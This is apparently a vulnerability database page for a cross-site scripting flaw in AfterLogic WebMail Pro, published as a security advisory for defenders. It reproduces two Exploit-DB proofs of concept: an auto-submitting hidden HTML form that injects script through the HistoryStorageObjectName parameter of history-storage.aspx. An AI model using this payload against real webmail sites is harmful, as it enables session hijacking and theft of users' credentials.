VIR Vulnerability Intelligence Relay

CVE-2009-4743

medium
Published 2010-03-26 · Modified 2026-04-29
💬 Discuss on Community ✚ Propose mitigation
CVSS v3
CVSS v4 NEW
not yet in upstream
VIR risk
5.3

Description

Multiple cross-site scripting (XSS) vulnerabilities in history-storage.aspx in AfterLogic WebMail Pro 4.7.10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) HistoryStorageObjectName and (2) HistoryKey parameters.

Predictions

Exploit likelihood
20%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-9857 webapps asp verified text · 2 KB
Sébastien Duquette · 2009-10-05

AfterLogic WebMail Pro 4.7.10 - Cross-Site Scripting

text exploit Source: Exploit-DB 
Security Advisory : Cross-Site Scripting flaw in AfterLogic WebMail Pro

Description
-------------
AfterLogic WebMail Pro is vulnerable to Cross-Site Scripting, allowing injection
of malicious code in the context of the application.

Overview
-----------
Quote from http://www.afterlogic.com/products/webmail-pro :
"Webmail front-end for your existing POP3/IMAP mail server. Offer your users
the fast AJAX webmail and innovative calendar with sharing. Stay in control
with the admin panel and the developer's API."

Details
--------
Vulnerable Product : AfterLogic WebMail Pro <= 4.7.10
Vulnerability Type : Cross-Site Scripting (XSS)
Affected page : history-storage.aspx
Vulnerable parameters : HistoryKey, HistoryStorageObjectName
Discovered by :
Sébastien Duquette (http://intheknow-security.blogspot.com)
Gardien Virtuel (www.gardienvirtuel.com)
Original Advisory :
http://www.gardienvirtuel.com/fichiers/documents/publications/GVI_2009-01_EN.txt

Timeline
----------
Bug Discovered : September 18th, 2009
Vendor Advised : September 23rd, 2009
Fix made available : September 30th, 2009

Proof of concept
-------------------
The targeted user must be logged in the webmail. This proof of concept was
successfully tested in Firefox 3.5 and Internet Explorer 8.

<html>
<head>
</head>
<body onLoad="document.form1.submit()">
<form name="form1" method="post"
action="http://WEBSITE/history-storage.aspx?param=0.21188772204998574";
onSubmit="return false;">
<input type="hidden" name="HistoryKey" value="value"/>
<input type="hidden" name="HistoryStorageObjectName" value="location;
alert('xss'); //"/>
</form>
</body>
</html>

Solution
---------
The vendor has made available a patched version. Update to AfterLogic
Webmail Pro 4.7.11
EDB-33268 webapps asp verified text · 1 KB
Sébastien Duquette · 2009-10-06

AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities

text exploit Source: Exploit-DB 
source: https://www.securityfocus.com/bid/36605/info

AfterLogic WebMail Pro is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.

AfterLogic WebMail Pro 4.7.10 and prior versions are affected. 

<html> <head> </head> <body onLoad="document.form1.submit()"> <form name="form1" method="post" action="http://www.example.com/history-storage.aspx?param=0.21188772204998574" onSubmit="return false;"> <input type="hidden" name="HistoryKey" value="value"/> <input type="hidden" name="HistoryStorageObjectName" value="location; alert('xss'); //"/> </form> </body> </html>

Application impact
VendorProductVersionsFixed
afterlogicwebmail_pro{"endIncluding":"4.7.10"}
afterlogicwebmail_pro4.5

References

CWEs

CWE-79

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.